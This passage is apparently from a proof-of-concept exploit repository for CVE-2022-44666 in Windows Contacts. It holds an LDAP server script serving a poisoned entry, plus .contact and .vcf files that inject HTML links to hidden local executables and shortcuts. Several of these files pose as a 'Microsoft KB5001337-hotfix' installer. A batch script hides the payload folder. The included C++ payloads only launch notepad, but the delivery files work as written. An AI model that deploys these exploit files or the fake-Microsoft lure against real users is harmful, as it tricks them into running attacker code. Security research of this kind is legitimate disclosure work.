dn: cn=PoC,ou=people,dc=example,dc=org 44 | cn: PoC 45 | gn: Microsoft 46 | company: Microsoft 47 | title: Microsoft KB5014666-hotfix 48 | mail:">Run-installer 49 | url:">Run-installer 50 | wwwhomepage:">Run-installer 51 | objectclass: top 52 | objectclass: person 53 | objectClass: inetOrgPerson 54 | 55 | """ 56 | 57 | 58 | class Tree: 59 | def __init__(self): 60 | global LDIF 61 | self.f = io.BytesIO(LDIF) 62 | d = fromLDIFFile(self.f) 63 | d.addCallback(self.ldifRead) 64 | 65 | def ldifRead(self, result): 66 | self.f.close() 67 | self.db = result 68 | 69 | 70 | class LDAPServerFactory(ServerFactory): 71 | protocol = LDAPServer 72 | 73 | def __init__(self, root): 74 | self.root = root 75 | 76 | def buildProtocol(self, addr): 77 | proto = self.protocol() 78 | proto.debug = self.debug 79 | proto.factory = self 80 | return proto 81 | 82 | 83 | if __name__ == "__main__": 84 | from twisted.internet import reactor 85 | 86 | if len(sys.argv) == 2: 87 | port = int(sys.argv[1]) 88 | else: 89 | port = 389 90 | # First of all, to show logging info in stdout : 91 | log.startLogging(sys.stderr) 92 | # We initialize our tree 93 | tree = Tree() 94 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 95 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 96 | # of the DIT. The factory that creates the protocol must therefore 97 | # be adapted to the IConnectedLDAPEntry interface. 98 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 99 | factory = LDAPServerFactory(tree.db) 100 | factory.debug = True 101 | application = service.Application("ldaptor-server") 102 | myService = service.IServiceCollection(application) 103 | serverEndpointStr = "tcp:{0}".format(port) 104 | e = serverFromString(reactor, serverEndpointStr) 105 | d = e.listen(factory) 106 | reactor.run() -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix/install-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="..\hidden\payload.lnk">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5001337-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | "></a><a href="..\hidden\payload.exe">Run-installer </a> 30 | 31 | Business 32 | 33 | 34 | 35 | "></a><a href="notepad">Run-installer </a> 36 | 37 | Personal 38 | 39 | 40 | 41 | 42 | 43 | Microsoft Hotfix 44 | Microsoft Corporation 45 | 46 | Business 47 | 48 | 49 | 50 | 51 | 52 | 53 | UserTile 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix/install-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5001337-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.bin -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.exe -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/hidden/payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/to-copy-in-remote-shared-location/hidden/payload.lnk -------------------------------------------------------------------------------- /further-pocs/to-copy-in-remote-shared-location/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\payload.bin 2 | attrib +s +h +r hidden\payload.exe 3 | attrib +s +h +r hidden\payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /images/convert-vcf-to-contact-wabmig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/convert-vcf-to-contact-wabmig.png -------------------------------------------------------------------------------- /images/credits-update-cve-2022-44666.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/credits-update-cve-2022-44666.png -------------------------------------------------------------------------------- /images/href-attribute-fake-target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-fake-target.png -------------------------------------------------------------------------------- /images/href-attribute-relative-exec-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-exec-payload.png -------------------------------------------------------------------------------- /images/href-attribute-relative-lnk-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-lnk-payload.png -------------------------------------------------------------------------------- /images/href-attribute-relative-path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-relative-path.png -------------------------------------------------------------------------------- /images/href-attribute-remote-loc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/href-attribute-remote-loc.png -------------------------------------------------------------------------------- /images/msrc-reply-se-attack-not-meet-sec-update.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/msrc-reply-se-attack-not-meet-sec-update.png -------------------------------------------------------------------------------- /images/msrc-reply-vcf-opened-non-default-program.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/images/msrc-reply-vcf-opened-non-default-program.png -------------------------------------------------------------------------------- /report-pocs/exploit.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="hidden\payload.lnk">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | j00sean 23 | j00sean 24 | j00sean 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="hidden\payload.exe">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Security researcher 66 | 0day Factory 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /report-pocs/exploit.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:j00sean 4 | FN:j00sean 5 | NICKNAME:j00sean 6 | ORG:0day Factory 7 | TITLE:Security researcher 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 12 | URL;WORK:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 13 | URL;TYPE=HOME:">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE 14 | END:VCARD -------------------------------------------------------------------------------- /report-pocs/exploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/exploit.zip -------------------------------------------------------------------------------- /report-pocs/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.bin -------------------------------------------------------------------------------- /report-pocs/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.exe -------------------------------------------------------------------------------- /report-pocs/hidden/payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/report-pocs/hidden/payload.lnk -------------------------------------------------------------------------------- /src/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #pragma warning(disable: 28159) 3 | #include "pch.h" 4 | 5 | extern "C" __declspec(dllexport) void Foo() {}; 6 | 7 | void inject() { 8 | WinExec("notepad", 1); 9 | } 10 | 11 | BOOL APIENTRY DllMain( HMODULE hModule, 12 | DWORD ul_reason_for_call, 13 | LPVOID lpReserved 14 | ) 15 | { 16 | switch (ul_reason_for_call) 17 | { 18 | case DLL_PROCESS_ATTACH: 19 | inject(); 20 | case DLL_THREAD_ATTACH: 21 | case DLL_THREAD_DETACH: 22 | case DLL_PROCESS_DETACH: 23 | break; 24 | } 25 | return TRUE; 26 | } 27 | 28 | -------------------------------------------------------------------------------- /src/payload.cpp: -------------------------------------------------------------------------------- 1 | // payload.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | #pragma warning(disable: 28159) 4 | #include 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) 8 | { 9 | WinExec("notepad", 1); 10 | } 11 | -------------------------------------------------------------------------------- /videos/browsers-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/browsers-exploit.gif -------------------------------------------------------------------------------- /videos/browsers-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/browsers-poc.gif -------------------------------------------------------------------------------- /videos/full-payload.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/full-payload.gif -------------------------------------------------------------------------------- /videos/ldap-browsers-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-browsers-exploit.gif -------------------------------------------------------------------------------- /videos/ldap-msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-msword-exploit.gif -------------------------------------------------------------------------------- /videos/ldap-pdfreaders-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/ldap-pdfreaders-exploit.gif -------------------------------------------------------------------------------- /videos/micropatch-0patch.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/micropatch-0patch.gif -------------------------------------------------------------------------------- /videos/msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/msword-exploit.gif -------------------------------------------------------------------------------- /videos/msword-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/msword-poc.gif -------------------------------------------------------------------------------- /videos/pdfreaders-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/pdfreaders-exploit.gif -------------------------------------------------------------------------------- /videos/pdfreaders-poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/pdfreaders-poc.gif -------------------------------------------------------------------------------- /videos/simple-payload.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/videos/simple-payload.gif --------------------------------------------------------------------------------